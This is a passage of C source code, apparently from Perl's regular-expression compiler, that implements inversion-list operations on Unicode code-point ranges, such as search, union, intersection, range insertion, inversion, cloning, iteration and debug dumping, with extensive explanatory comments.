* function will often be for related code points that are near each other.
* And benchmarks show that caching gives better results. We also test
* here if the code point is within the bounds of the list. These tests
* replace others that would have had to be made anyway to make sure that
* the array bounds were not exceeded, and these give us extra information
* at the same time */
if (cp >= array[mid]) {
if (cp >= array[highest_element]) {
return highest_element;
}
/* Here, array[mid] <= cp < array[highest_element]. This means that
* the final element is not the answer, so can exclude it; it also
* means that <mid> is not the final element, so can refer to 'mid + 1'
* safely */
if (cp < array[mid + 1]) {
return mid;
}
high--;
low = mid + 1;
}
else { /* cp < aray[mid] */
if (cp < array[0]) { /* Fail if outside the array */
return -1;
}
high = mid;
if (cp >= array[mid - 1]) {
goto found_entry;
}
}
/* Binary search. What we are looking for is <i> such that
* array[i] <= cp < array[i+1]
* The loop below converges on the i+1. Note that there may not be an
* (i+1)th element in the array, and things work nonetheless */
while (low < high) {
mid = (low + high) / 2;
assert(mid <= highest_element);
if (array[mid] <= cp) { /* cp >= array[mid] */
low = mid + 1;
/* We could do this extra test to exit the loop early.
if (cp < array[low]) {
return mid;
}
*/
}
else { /* cp < array[mid] */
high = mid;
}
}
found_entry:
high--;
invlist_set_previous_index(invlist, high);
return high;
}
void
Perl__invlist_union_maybe_complement_2nd(pTHX_ SV* const a, SV* const b,
const bool complement_b, SV** output)
{
/* Take the union of two inversion lists and point '*output' to it. On
* input, '*output' MUST POINT TO NULL OR TO AN SV* INVERSION LIST (possibly
* even 'a' or 'b'). If to an inversion list, the contents of the original
* list will be replaced by the union. The first list, 'a', may be
* NULL, in which case a copy of the second list is placed in '*output'.
* If 'complement_b' is TRUE, the union is taken of the complement
* (inversion) of 'b' instead of b itself.
*
* The basis for this comes from "Unicode Demystified" Chapter 13 by
* Richard Gillam, published by Addison-Wesley, and explained at some
* length there. The preface says to incorporate its examples into your
* code at your own risk.
*
* The algorithm is like a merge sort. */
const UV* array_a; /* a's array */
const UV* array_b;
UV len_a; /* length of a's array */
UV len_b;
SV* u; /* the resulting union */
UV* array_u;
UV len_u = 0;
UV i_a = 0; /* current index into a's array */
UV i_b = 0;
UV i_u = 0;
/* running count, as explained in the algorithm source book; items are
* stopped accumulating and are output when the count changes to/from 0.
* The count is incremented when we start a range that's in an input's set,
* and decremented when we start a range that's not in a set. So this
* variable can be 0, 1, or 2. When it is 0 neither input is in their set,
* and hence nothing goes into the union; 1, just one of the inputs is in
* its set (and its current range gets added to the union); and 2 when both
* inputs are in their sets. */
UV count = 0;
PERL_ARGS_ASSERT__INVLIST_UNION_MAYBE_COMPLEMENT_2ND;
assert(a != b);
assert(*output == NULL || is_invlist(*output));
len_b = _invlist_len(b);
if (len_b == 0) {
/* Here, 'b' is empty, hence it's complement is all possible code
* points. So if the union includes the complement of 'b', it includes
* everything, and we need not even look at 'a'. It's easiest to
* create a new inversion list that matches everything. */
if (complement_b) {
SV* everything = _add_range_to_invlist(NULL, 0, UV_MAX);
if (*output == NULL) { /* If the output didn't exist, just point it
at the new list */
*output = everything;
}
else { /* Otherwise, replace its contents with the new list */
invlist_replace_list_destroys_src(*output, everything);
SvREFCNT_dec_NN(everything);
}
return;
}
/* Here, we don't want the complement of 'b', and since 'b' is empty,
* the union will come entirely from 'a'. If 'a' is NULL or empty, the
* output will be empty */
if (a == NULL || _invlist_len(a) == 0) {
if (*output == NULL) {
*output = _new_invlist(0);
}
else {
invlist_clear(*output);
}
return;
}
/* Here, 'a' is not empty, but 'b' is, so 'a' entirely determines the
* union. We can just return a copy of 'a' if '*output' doesn't point
* to an existing list */
if (*output == NULL) {
*output = invlist_clone(a, NULL);
return;
}
/* If the output is to overwrite 'a', we have a no-op, as it's
* already in 'a' */
if (*output == a) {
return;
}
/* Here, '*output' is to be overwritten by 'a' */
u = invlist_clone(a, NULL);
invlist_replace_list_destroys_src(*output, u);
SvREFCNT_dec_NN(u);
return;
}
/* Here 'b' is not empty. See about 'a' */
if (a == NULL || ((len_a = _invlist_len(a)) == 0)) {
/* Here, 'a' is empty (and b is not). That means the union will come
* entirely from 'b'. If '*output' is NULL, we can directly return a
* clone of 'b'. Otherwise, we replace the contents of '*output' with
* the clone */
SV ** dest = (*output == NULL) ? output : &u;
*dest = invlist_clone(b, NULL);
if (complement_b) {
_invlist_invert(*dest);
}
if (dest == &u) {
invlist_replace_list_destroys_src(*output, u);
SvREFCNT_dec_NN(u);
}
return;
}
/* Here both lists exist and are non-empty */
array_a = invlist_array(a);
array_b = invlist_array(b);
/* If are to take the union of 'a' with the complement of b, set it
* up so are looking at b's complement. */
if (complement_b) {
/* To complement, we invert: if the first element is 0, remove it. To
* do this, we just pretend the array starts one later */
if (array_b[0] == 0) {
array_b++;
len_b--;
}
else {
/* But if the first element is not zero, we pretend the list starts
* at the 0 that is always stored immediately before the array. */
array_b--;
len_b++;
}
}
/* Size the union for the worst case: that the sets are completely
* disjoint */
u = _new_invlist(len_a + len_b);
/* Will contain U+0000 if either component does */
array_u = _invlist_array_init(u, ( len_a > 0 && array_a[0] == 0)
|| (len_b > 0 && array_b[0] == 0));
/* Go through each input list item by item, stopping when have exhausted
* one of them */
while (i_a < len_a && i_b < len_b) {
UV cp; /* The element to potentially add to the union's array */
bool cp_in_set; /* is it in the the input list's set or not */
/* We need to take one or the other of the two inputs for the union.
* Since we are merging two sorted lists, we take the smaller of the
* next items. In case of a tie, we take first the one that is in its
* set. If we first took the one not in its set, it would decrement
* the count, possibly to 0 which would cause it to be output as ending
* the range, and the next time through we would take the same number,
* and output it again as beginning the next range. By doing it the
* opposite way, there is no possibility that the count will be
* momentarily decremented to 0, and thus the two adjoining ranges will
* be seamlessly merged. (In a tie and both are in the set or both not
* in the set, it doesn't matter which we take first.) */
if ( array_a[i_a] < array_b[i_b]
|| ( array_a[i_a] == array_b[i_b]
&& ELEMENT_RANGE_MATCHES_INVLIST(i_a)))
{
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_a);
cp = array_a[i_a++];
}
else {
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_b);
cp = array_b[i_b++];
}
/* Here, have chosen which of the two inputs to look at. Only output
* if the running count changes to/from 0, which marks the
* beginning/end of a range that's in the set */
if (cp_in_set) {
if (count == 0) {
array_u[i_u++] = cp;
}
count++;
}
else {
count--;
if (count == 0) {
array_u[i_u++] = cp;
}
}
}
/* The loop above increments the index into exactly one of the input lists
* each iteration, and ends when either index gets to its list end. That
* means the other index is lower than its end, and so something is
* remaining in that one. We decrement 'count', as explained below, if
* that list is in its set. (i_a and i_b each currently index the element
* beyond the one we care about.) */
if ( (i_a != len_a && PREV_RANGE_MATCHES_INVLIST(i_a))
|| (i_b != len_b && PREV_RANGE_MATCHES_INVLIST(i_b)))
{
count--;
}
/* Above we decremented 'count' if the list that had unexamined elements in
* it was in its set. This has made it so that 'count' being non-zero
* means there isn't anything left to output; and 'count' equal to 0 means
* that what is left to output is precisely that which is left in the
* non-exhausted input list.
*
* To see why, note first that the exhausted input obviously has nothing
* left to add to the union. If it was in its set at its end, that means
* the set extends from here to the platform's infinity, and hence so does
* the union and the non-exhausted set is irrelevant. The exhausted set
* also contributed 1 to 'count'. If 'count' was 2, it got decremented to
* 1, but if it was 1, the non-exhausted set wasn't in its set, and so
* 'count' remains at 1. This is consistent with the decremented 'count'
* != 0 meaning there's nothing left to add to the union.
*
* But if the exhausted input wasn't in its set, it contributed 0 to
* 'count', and the rest of the union will be whatever the other input is.
* If 'count' was 0, neither list was in its set, and 'count' remains 0;
* otherwise it gets decremented to 0. This is consistent with 'count'
* == 0 meaning the remainder of the union is whatever is left in the
* non-exhausted list. */
if (count != 0) {
len_u = i_u;
}
else {
IV copy_count = len_a - i_a;
if (copy_count > 0) { /* The non-exhausted input is 'a' */
Copy(array_a + i_a, array_u + i_u, copy_count, UV);
}
else { /* The non-exhausted input is b */
copy_count = len_b - i_b;
Copy(array_b + i_b, array_u + i_u, copy_count, UV);
}
len_u = i_u + copy_count;
}
/* Set the result to the final length, which can change the pointer to
* array_u, so re-find it. (Note that it is unlikely that this will
* change, as we are shrinking the space, not enlarging it) */
if (len_u != _invlist_len(u)) {
invlist_set_len(u, len_u, *get_invlist_offset_addr(u));
invlist_trim(u);
array_u = invlist_array(u);
}
if (*output == NULL) { /* Simply return the new inversion list */
*output = u;
}
else {
/* Otherwise, overwrite the inversion list that was in '*output'. We
* could instead free '*output', and then set it to 'u', but experience
* has shown [perl #127392] that if the input is a mortal, we can get a
* huge build-up of these during regex compilation before they get
* freed. */
invlist_replace_list_destroys_src(*output, u);
SvREFCNT_dec_NN(u);
}
return;
}
void
Perl__invlist_intersection_maybe_complement_2nd(pTHX_ SV* const a, SV* const b,
const bool complement_b, SV** i)
{
/* Take the intersection of two inversion lists and point '*i' to it. On
* input, '*i' MUST POINT TO NULL OR TO AN SV* INVERSION LIST (possibly
* even 'a' or 'b'). If to an inversion list, the contents of the original
* list will be replaced by the intersection. The first list, 'a', may be
* NULL, in which case '*i' will be an empty list. If 'complement_b' is
* TRUE, the result will be the intersection of 'a' and the complement (or
* inversion) of 'b' instead of 'b' directly.
*
* The basis for this comes from "Unicode Demystified" Chapter 13 by
* Richard Gillam, published by Addison-Wesley, and explained at some
* length there. The preface says to incorporate its examples into your
* code at your own risk. In fact, it had bugs
*
* The algorithm is like a merge sort, and is essentially the same as the
* union above
*/
const UV* array_a; /* a's array */
const UV* array_b;
UV len_a; /* length of a's array */
UV len_b;
SV* r; /* the resulting intersection */
UV* array_r;
UV len_r = 0;
UV i_a = 0; /* current index into a's array */
UV i_b = 0;
UV i_r = 0;
/* running count of how many of the two inputs are postitioned at ranges
* that are in their sets. As explained in the algorithm source book,
* items are stopped accumulating and are output when the count changes
* to/from 2. The count is incremented when we start a range that's in an
* input's set, and decremented when we start a range that's not in a set.
* Only when it is 2 are we in the intersection. */
UV count = 0;
PERL_ARGS_ASSERT__INVLIST_INTERSECTION_MAYBE_COMPLEMENT_2ND;
assert(a != b);
assert(*i == NULL || is_invlist(*i));
/* Special case if either one is empty */
len_a = (a == NULL) ? 0 : _invlist_len(a);
if ((len_a == 0) || ((len_b = _invlist_len(b)) == 0)) {
if (len_a != 0 && complement_b) {
/* Here, 'a' is not empty, therefore from the enclosing 'if', 'b'
* must be empty. Here, also we are using 'b's complement, which
* hence must be every possible code point. Thus the intersection
* is simply 'a'. */
if (*i == a) { /* No-op */
return;
}
if (*i == NULL) {
*i = invlist_clone(a, NULL);
return;
}
r = invlist_clone(a, NULL);
invlist_replace_list_destroys_src(*i, r);
SvREFCNT_dec_NN(r);
return;
}
/* Here, 'a' or 'b' is empty and not using the complement of 'b'. The
* intersection must be empty */
if (*i == NULL) {
*i = _new_invlist(0);
return;
}
invlist_clear(*i);
return;
}
/* Here both lists exist and are non-empty */
array_a = invlist_array(a);
array_b = invlist_array(b);
/* If are to take the intersection of 'a' with the complement of b, set it
* up so are looking at b's complement. */
if (complement_b) {
/* To complement, we invert: if the first element is 0, remove it. To
* do this, we just pretend the array starts one later */
if (array_b[0] == 0) {
array_b++;
len_b--;
}
else {
/* But if the first element is not zero, we pretend the list starts
* at the 0 that is always stored immediately before the array. */
array_b--;
len_b++;
}
}
/* Size the intersection for the worst case: that the intersection ends up
* fragmenting everything to be completely disjoint */
r= _new_invlist(len_a + len_b);
/* Will contain U+0000 iff both components do */
array_r = _invlist_array_init(r, len_a > 0 && array_a[0] == 0
&& len_b > 0 && array_b[0] == 0);
/* Go through each list item by item, stopping when have exhausted one of
* them */
while (i_a < len_a && i_b < len_b) {
UV cp; /* The element to potentially add to the intersection's
array */
bool cp_in_set; /* Is it in the input list's set or not */
/* We need to take one or the other of the two inputs for the
* intersection. Since we are merging two sorted lists, we take the
* smaller of the next items. In case of a tie, we take first the one
* that is not in its set (a difference from the union algorithm). If
* we first took the one in its set, it would increment the count,
* possibly to 2 which would cause it to be output as starting a range
* in the intersection, and the next time through we would take that
* same number, and output it again as ending the set. By doing the
* opposite of this, there is no possibility that the count will be
* momentarily incremented to 2. (In a tie and both are in the set or
* both not in the set, it doesn't matter which we take first.) */
if ( array_a[i_a] < array_b[i_b]
|| ( array_a[i_a] == array_b[i_b]
&& ! ELEMENT_RANGE_MATCHES_INVLIST(i_a)))
{
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_a);
cp = array_a[i_a++];
}
else {
cp_in_set = ELEMENT_RANGE_MATCHES_INVLIST(i_b);
cp= array_b[i_b++];
}
/* Here, have chosen which of the two inputs to look at. Only output
* if the running count changes to/from 2, which marks the
* beginning/end of a range that's in the intersection */
if (cp_in_set) {
count++;
if (count == 2) {
array_r[i_r++] = cp;
}
}
else {
if (count == 2) {
array_r[i_r++] = cp;
}
count--;
}
}
/* The loop above increments the index into exactly one of the input lists
* each iteration, and ends when either index gets to its list end. That
* means the other index is lower than its end, and so something is
* remaining in that one. We increment 'count', as explained below, if the
* exhausted list was in its set. (i_a and i_b each currently index the
* element beyond the one we care about.) */
if ( (i_a == len_a && PREV_RANGE_MATCHES_INVLIST(i_a))
|| (i_b == len_b && PREV_RANGE_MATCHES_INVLIST(i_b)))
{
count++;
}
/* Above we incremented 'count' if the exhausted list was in its set. This
* has made it so that 'count' being below 2 means there is nothing left to
* output; otheriwse what's left to add to the intersection is precisely
* that which is left in the non-exhausted input list.
*
* To see why, note first that the exhausted input obviously has nothing
* left to affect the intersection. If it was in its set at its end, that
* means the set extends from here to the platform's infinity, and hence
* anything in the non-exhausted's list will be in the intersection, and
* anything not in it won't be. Hence, the rest of the intersection is
* precisely what's in the non-exhausted list The exhausted set also
* contributed 1 to 'count', meaning 'count' was at least 1. Incrementing
* it means 'count' is now at least 2. This is consistent with the
* incremented 'count' being >= 2 means to add the non-exhausted list to
* the intersection.
*
* But if the exhausted input wasn't in its set, it contributed 0 to
* 'count', and the intersection can't include anything further; the
* non-exhausted set is irrelevant. 'count' was at most 1, and doesn't get
* incremented. This is consistent with 'count' being < 2 meaning nothing
* further to add to the intersection. */
if (count < 2) { /* Nothing left to put in the intersection. */
len_r = i_r;
}
else { /* copy the non-exhausted list, unchanged. */
IV copy_count = len_a - i_a;
if (copy_count > 0) { /* a is the one with stuff left */
Copy(array_a + i_a, array_r + i_r, copy_count, UV);
}
else { /* b is the one with stuff left */
copy_count = len_b - i_b;
Copy(array_b + i_b, array_r + i_r, copy_count, UV);
}
len_r = i_r + copy_count;
}
/* Set the result to the final length, which can change the pointer to
* array_r, so re-find it. (Note that it is unlikely that this will
* change, as we are shrinking the space, not enlarging it) */
if (len_r != _invlist_len(r)) {
invlist_set_len(r, len_r, *get_invlist_offset_addr(r));
invlist_trim(r);
array_r = invlist_array(r);
}
if (*i == NULL) { /* Simply return the calculated intersection */
*i = r;
}
else { /* Otherwise, replace the existing inversion list in '*i'. We could
instead free '*i', and then set it to 'r', but experience has
shown [perl #127392] that if the input is a mortal, we can get a
huge build-up of these during regex compilation before they get
freed. */
if (len_r) {
invlist_replace_list_destroys_src(*i, r);
}
else {
invlist_clear(*i);
}
SvREFCNT_dec_NN(r);
}
return;
}
SV*
Perl__add_range_to_invlist(pTHX_ SV* invlist, UV start, UV end)
{
/* Add the range from 'start' to 'end' inclusive to the inversion list's
* set. A pointer to the inversion list is returned. This may actually be
* a new list, in which case the passed in one has been destroyed. The
* passed-in inversion list can be NULL, in which case a new one is created
* with just the one range in it. The new list is not necessarily
* NUL-terminated. Space is not freed if the inversion list shrinks as a
* result of this function. The gain would not be large, and in many
* cases, this is called multiple times on a single inversion list, so
* anything freed may almost immediately be needed again.
*
* This used to mostly call the 'union' routine, but that is much more
* heavyweight than really needed for a single range addition */
UV* array; /* The array implementing the inversion list */
UV len; /* How many elements in 'array' */
SSize_t i_s; /* index into the invlist array where 'start'
should go */
SSize_t i_e = 0; /* And the index where 'end' should go */
UV cur_highest; /* The highest code point in the inversion list
upon entry to this function */
/* This range becomes the whole inversion list if none already existed */
if (invlist == NULL) {
invlist = _new_invlist(2);
_append_range_to_invlist(invlist, start, end);
return invlist;
}
/* Likewise, if the inversion list is currently empty */
len = _invlist_len(invlist);
if (len == 0) {
_append_range_to_invlist(invlist, start, end);
return invlist;
}
/* Starting here, we have to know the internals of the list */
array = invlist_array(invlist);
/* If the new range ends higher than the current highest ... */
cur_highest = invlist_highest(invlist);
if (end > cur_highest) {
/* If the whole range is higher, we can just append it */
if (start > cur_highest) {
_append_range_to_invlist(invlist, start, end);
return invlist;
}
/* Otherwise, add the portion that is higher ... */
_append_range_to_invlist(invlist, cur_highest + 1, end);
/* ... and continue on below to handle the rest. As a result of the
* above append, we know that the index of the end of the range is the
* final even numbered one of the array. Recall that the final element
* always starts a range that extends to infinity. If that range is in
* the set (meaning the set goes from here to infinity), it will be an
* even index, but if it isn't in the set, it's odd, and the final
* range in the set is one less, which is even. */
if (end == UV_MAX) {
i_e = len;
}
else {
i_e = len - 2;
}
}
/* We have dealt with appending, now see about prepending. If the new
* range starts lower than the current lowest ... */
if (start < array[0]) {
/* Adding something which has 0 in it is somewhat tricky, and uncommon.
* Let the union code handle it, rather than having to know the
* trickiness in two code places. */
if (UNLIKELY(start == 0)) {
SV* range_invlist;
range_invlist = _new_invlist(2);
_append_range_to_invlist(range_invlist, start, end);
_invlist_union(invlist, range_invlist, &invlist);
SvREFCNT_dec_NN(range_invlist);
return invlist;
}
/* If the whole new range comes before the first entry, and doesn't
* extend it, we have to insert it as an additional range */
if (end < array[0] - 1) {
i_s = i_e = -1;
goto splice_in_new_range;
}
/* Here the new range adjoins the existing first range, extending it
* downwards. */
array[0] = start;
/* And continue on below to handle the rest. We know that the index of
* the beginning of the range is the first one of the array */
i_s = 0;
}
else { /* Not prepending any part of the new range to the existing list.
* Find where in the list it should go. This finds i_s, such that:
* invlist[i_s] <= start < array[i_s+1]
*/
i_s = _invlist_search(invlist, start);
}
/* At this point, any extending before the beginning of the inversion list
* and/or after the end has been done. This has made it so that, in the
* code below, each endpoint of the new range is either in a range that is
* in the set, or is in a gap between two ranges that are. This means we
* don't have to worry about exceeding the array bounds.
*
* Find where in the list the new range ends (but we can skip this if we
* have already determined what it is, or if it will be the same as i_s,
* which we already have computed) */
if (i_e == 0) {
i_e = (start == end)
? i_s
: _invlist_search(invlist, end);
}
/* Here generally invlist[i_e] <= end < array[i_e+1]. But if invlist[i_e]
* is a range that goes to infinity there is no element at invlist[i_e+1],
* so only the first relation holds. */
if ( ! ELEMENT_RANGE_MATCHES_INVLIST(i_s)) {
/* Here, the ranges on either side of the beginning of the new range
* are in the set, and this range starts in the gap between them.
*
* The new range extends the range above it downwards if the new range
* ends at or above that range's start */
const bool extends_the_range_above = ( end == UV_MAX
|| end + 1 >= array[i_s+1]);
/* The new range extends the range below it upwards if it begins just
* after where that range ends */
if (start == array[i_s]) {
/* If the new range fills the entire gap between the other ranges,
* they will get merged together. Other ranges may also get
* merged, depending on how many of them the new range spans. In
* the general case, we do the merge later, just once, after we
* figure out how many to merge. But in the case where the new
* range exactly spans just this one gap (possibly extending into
* the one above), we do the merge here, and an early exit. This
* is done here to avoid having to special case later. */
if (i_e - i_s <= 1) {
/* If i_e - i_s == 1, it means that the new range terminates
* within the range above, and hence 'extends_the_range_above'
* must be true. (If the range above it extends to infinity,
* 'i_s+2' will be above the array's limit, but 'len-i_s-2'
* will be 0, so no harm done.) */
if (extends_the_range_above) {
Move(array + i_s + 2, array + i_s, len - i_s - 2, UV);
invlist_set_len(invlist,
len - 2,
*(get_invlist_offset_addr(invlist)));
return invlist;
}
/* Here, i_e must == i_s. We keep them in sync, as they apply
* to the same range, and below we are about to decrement i_s
* */
i_e--;
}
/* Here, the new range is adjacent to the one below. (It may also
* span beyond the range above, but that will get resolved later.)
* Extend the range below to include this one. */
array[i_s] = (end == UV_MAX) ? UV_MAX : end + 1;
i_s--;
start = array[i_s];
}
else if (extends_the_range_above) {
/* Here the new range only extends the range above it, but not the
* one below. It merges with the one above. Again, we keep i_e
* and i_s in sync if they point to the same range */
if (i_e == i_s) {
i_e++;
}
i_s++;
array[i_s] = start;
}
}
/* Here, we've dealt with the new range start extending any adjoining
* existing ranges.
*
* If the new range extends to infinity, it is now the final one,
* regardless of what was there before */
if (UNLIKELY(end == UV_MAX)) {
invlist_set_len(invlist, i_s + 1, *(get_invlist_offset_addr(invlist)));
return invlist;
}
/* If i_e started as == i_s, it has also been dealt with,
* and been updated to the new i_s, which will fail the following if */
if (! ELEMENT_RANGE_MATCHES_INVLIST(i_e)) {
/* Here, the ranges on either side of the end of the new range are in
* the set, and this range ends in the gap between them.
*
* If this range is adjacent to (hence extends) the range above it, it
* becomes part of that range; likewise if it extends the range below,
* it becomes part of that range */
if (end + 1 == array[i_e+1]) {
i_e++;
array[i_e] = start;
}
else if (start <= array[i_e]) {
array[i_e] = end + 1;
i_e--;
}
}
if (i_s == i_e) {
/* If the range fits entirely in an existing range (as possibly already
* extended above), it doesn't add anything new */
if (ELEMENT_RANGE_MATCHES_INVLIST(i_s)) {
return invlist;
}
/* Here, no part of the range is in the list. Must add it. It will
* occupy 2 more slots */
splice_in_new_range:
invlist_extend(invlist, len + 2);
array = invlist_array(invlist);
/* Move the rest of the array down two slots. Don't include any
* trailing NUL */
Move(array + i_e + 1, array + i_e + 3, len - i_e - 1, UV);
/* Do the actual splice */
array[i_e+1] = start;
array[i_e+2] = end + 1;
invlist_set_len(invlist, len + 2, *(get_invlist_offset_addr(invlist)));
return invlist;
}
/* Here the new range crossed the boundaries of a pre-existing range. The
* code above has adjusted things so that both ends are in ranges that are
* in the set. This means everything in between must also be in the set.
* Just squash things together */
Move(array + i_e + 1, array + i_s + 1, len - i_e - 1, UV);
invlist_set_len(invlist,
len - i_e + i_s,
*(get_invlist_offset_addr(invlist)));
return invlist;
}
SV*
Perl__setup_canned_invlist(pTHX_ const STRLEN size, const UV element0,
UV** other_elements_ptr)
{
/* Create and return an inversion list whose contents are to be populated
* by the caller. The caller gives the number of elements (in 'size') and
* the very first element ('element0'). This function will set
* '*other_elements_ptr' to an array of UVs, where the remaining elements
* are to be placed.
*
* Obviously there is some trust involved that the caller will properly
* fill in the other elements of the array.
*
* (The first element needs to be passed in, as the underlying code does
* things differently depending on whether it is zero or non-zero) */
SV* invlist = _new_invlist(size);
bool offset;
PERL_ARGS_ASSERT__SETUP_CANNED_INVLIST;
invlist = add_cp_to_invlist(invlist, element0);
offset = *get_invlist_offset_addr(invlist);
invlist_set_len(invlist, size, offset);
*other_elements_ptr = invlist_array(invlist) + 1;
return invlist;
}
#endif
PERL_STATIC_INLINE SV*
S_add_cp_to_invlist(pTHX_ SV* invlist, const UV cp) {
return _add_range_to_invlist(invlist, cp, cp);
}
#ifndef PERL_IN_XSUB_RE
void
Perl__invlist_invert(pTHX_ SV* const invlist)
{
/* Complement the input inversion list. This adds a 0 if the list didn't
* have a zero; removes it otherwise. As described above, the data
* structure is set up so that this is very efficient */
PERL_ARGS_ASSERT__INVLIST_INVERT;
assert(! invlist_is_iterating(invlist));
/* The inverse of matching nothing is matching everything */
if (_invlist_len(invlist) == 0) {
_append_range_to_invlist(invlist, 0, UV_MAX);
return;
}
*get_invlist_offset_addr(invlist) = ! *get_invlist_offset_addr(invlist);
}
SV*
Perl_invlist_clone(pTHX_ SV* const invlist, SV* new_invlist)
{
/* Return a new inversion list that is a copy of the input one, which is
* unchanged. The new list will not be mortal even if the old one was. */
const STRLEN nominal_length = _invlist_len(invlist);
const STRLEN physical_length = SvCUR(invlist);
const bool offset = *(get_invlist_offset_addr(invlist));
PERL_ARGS_ASSERT_INVLIST_CLONE;
if (new_invlist == NULL) {
new_invlist = _new_invlist(nominal_length);
}
else {
sv_upgrade(new_invlist, SVt_INVLIST);
initialize_invlist_guts(new_invlist, nominal_length);
}
*(get_invlist_offset_addr(new_invlist)) = offset;
invlist_set_len(new_invlist, nominal_length, offset);
Copy(SvPVX(invlist), SvPVX(new_invlist), physical_length, char);
return new_invlist;
}
#endif
PERL_STATIC_INLINE STRLEN*
S_get_invlist_iter_addr(SV* invlist)
{
/* Return the address of the UV that contains the current iteration
* position */
PERL_ARGS_ASSERT_GET_INVLIST_ITER_ADDR;
assert(is_invlist(invlist));
return &(((XINVLIST*) SvANY(invlist))->iterator);
}
PERL_STATIC_INLINE void
S_invlist_iterinit(SV* invlist) /* Initialize iterator for invlist */
{
PERL_ARGS_ASSERT_INVLIST_ITERINIT;
*get_invlist_iter_addr(invlist) = 0;
}
PERL_STATIC_INLINE void
S_invlist_iterfinish(SV* invlist)
{
/* Terminate iterator for invlist. This is to catch development errors.
* Any iteration that is interrupted before completed should call this
* function. Functions that add code points anywhere else but to the end
* of an inversion list assert that they are not in the middle of an
* iteration. If they were, the addition would make the iteration
* problematical: if the iteration hadn't reached the place where things
* were being added, it would be ok */
PERL_ARGS_ASSERT_INVLIST_ITERFINISH;
*get_invlist_iter_addr(invlist) = (STRLEN) UV_MAX;
}
STATIC bool
S_invlist_iternext(SV* invlist, UV* start, UV* end)
{
/* An C<invlist_iterinit> call on <invlist> must be used to set this up.
* This call sets in <*start> and <*end>, the next range in <invlist>.
* Returns <TRUE> if successful and the next call will return the next
* range; <FALSE> if was already at the end of the list. If the latter,
* <*start> and <*end> are unchanged, and the next call to this function
* will start over at the beginning of the list */
STRLEN* pos = get_invlist_iter_addr(invlist);
UV len = _invlist_len(invlist);
UV *array;
PERL_ARGS_ASSERT_INVLIST_ITERNEXT;
if (*pos >= len) {
*pos = (STRLEN) UV_MAX; /* Force iterinit() to be required next time */
return FALSE;
}
array = invlist_array(invlist);
*start = array[(*pos)++];
if (*pos >= len) {
*end = UV_MAX;
}
else {
*end = array[(*pos)++] - 1;
}
return TRUE;
}
PERL_STATIC_INLINE UV
S_invlist_highest(SV* const invlist)
{
/* Returns the highest code point that matches an inversion list. This API
* has an ambiguity, as it returns 0 under either the highest is actually
* 0, or if the list is empty. If this distinction matters to you, check
* for emptiness before calling this function */
UV len = _invlist_len(invlist);
UV *array;
PERL_ARGS_ASSERT_INVLIST_HIGHEST;
if (len == 0) {
return 0;
}
array = invlist_array(invlist);
/* The last element in the array in the inversion list always starts a
* range that goes to infinity. That range may be for code points that are
* matched in the inversion list, or it may be for ones that aren't
* matched. In the latter case, the highest code point in the set is one
* less than the beginning of this range; otherwise it is the final element
* of this range: infinity */
return (ELEMENT_RANGE_MATCHES_INVLIST(len - 1))
? UV_MAX
: array[len - 1] - 1;
}
STATIC SV *
S_invlist_contents(pTHX_ SV* const invlist, const bool traditional_style)
{
/* Get the contents of an inversion list into a string SV so that they can
* be printed out. If 'traditional_style' is TRUE, it uses the format
* traditionally done for debug tracing; otherwise it uses a format
* suitable for just copying to the output, with blanks between ranges and
* a dash between range components */
UV start, end;
SV* output;
const char intra_range_delimiter = (traditional_style ? '\t' : '-');
const char inter_range_delimiter = (traditional_style ? '\n' : ' ');
if (traditional_style) {
output = newSVpvs("\n");
}
else {
output = newSVpvs("");
}
PERL_ARGS_ASSERT_INVLIST_CONTENTS;
assert(! invlist_is_iterating(invlist));
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
if (end == UV_MAX) {
Perl_sv_catpvf(aTHX_ output, "%04" UVXf "%cINFTY%c",
start, intra_range_delimiter,
inter_range_delimiter);
}
else if (end != start) {
Perl_sv_catpvf(aTHX_ output, "%04" UVXf "%c%04" UVXf "%c",
start,
intra_range_delimiter,
end, inter_range_delimiter);
}
else {
Perl_sv_catpvf(aTHX_ output, "%04" UVXf "%c",
start, inter_range_delimiter);
}
}
if (SvCUR(output) && ! traditional_style) {/* Get rid of trailing blank */
SvCUR_set(output, SvCUR(output) - 1);
}
return output;
}
#ifndef PERL_IN_XSUB_RE
void
Perl__invlist_dump(pTHX_ PerlIO *file, I32 level,
const char * const indent, SV* const invlist)
{
/* Designed to be called only by do_sv_dump(). Dumps out the ranges of the
* inversion list 'invlist' to 'file' at 'level' Each line is prefixed by
* the string 'indent'. The output looks like this:
[0] 0x000A .. 0x000D
[2] 0x0085
[4] 0x2028 .. 0x2029
[6] 0x3104 .. INFTY
* This means that the first range of code points matched by the list are
* 0xA through 0xD; the second range contains only the single code point
* 0x85, etc. An inversion list is an array of UVs. Two array elements
* are used to define each range (except if the final range extends to
* infinity, only a single element is needed). The array index of the
* first element for the corresponding range is given in brackets. */
UV start, end;
STRLEN count = 0;
PERL_ARGS_ASSERT__INVLIST_DUMP;
if (invlist_is_iterating(invlist)) {
Perl_dump_indent(aTHX_ level, file,
"%sCan't dump inversion list because is in middle of iterating\n",
indent);
return;
}
invlist_iterinit(invlist);
while (invlist_iternext(invlist, &start, &end)) {
if (end == UV_MAX) {
Perl_dump_indent(aTHX_ level, file,
"%s[%" UVuf "] 0x%04" UVXf " .. INFTY\n",
indent, (UV)count, start);
}
else if (end != start) {
Perl_dump_indent(aTHX_ level, file,
"%s[%" UVuf "] 0x%04" UVXf " .. 0x%04" UVXf "\n",
indent, (UV)count, start, end);
}
else {
Perl_dump_indent(aTHX_ level, file, "%s[%" UVuf "] 0x%04" UVXf "\n",
indent, (UV)count, start);
}
count += 2;
}
}
#endif
#if defined(PERL_ARGS_ASSERT__INVLISTEQ) && !defined(PERL_IN_XSUB_RE)
bool
Perl__invlistEQ(pTHX_ SV* const a, SV* const b, const bool complement_b)
{
/* Return a boolean as to if the two passed in inversion lists are
* identical. The final argument, if TRUE, says to take the complement of
* the second inversion list before doing the comparison */
const UV len_a = _invlist_len(a);
UV len_b = _invlist_len(b);
const UV* array_a = NULL;
const UV* array_b = NULL;
PERL_ARGS_ASSERT__INVLISTEQ;
/* This code avoids accessing the arrays unless it knows the length is
* non-zero */
if (len_a == 0) {
if (len_b == 0) {
return ! complement_b;
}
}
else {
array_a = invlist_array(a);
}
if (len_b != 0) {
array_b = invlist_array(b);
}
/* If are to compare 'a' with the complement of b, set it
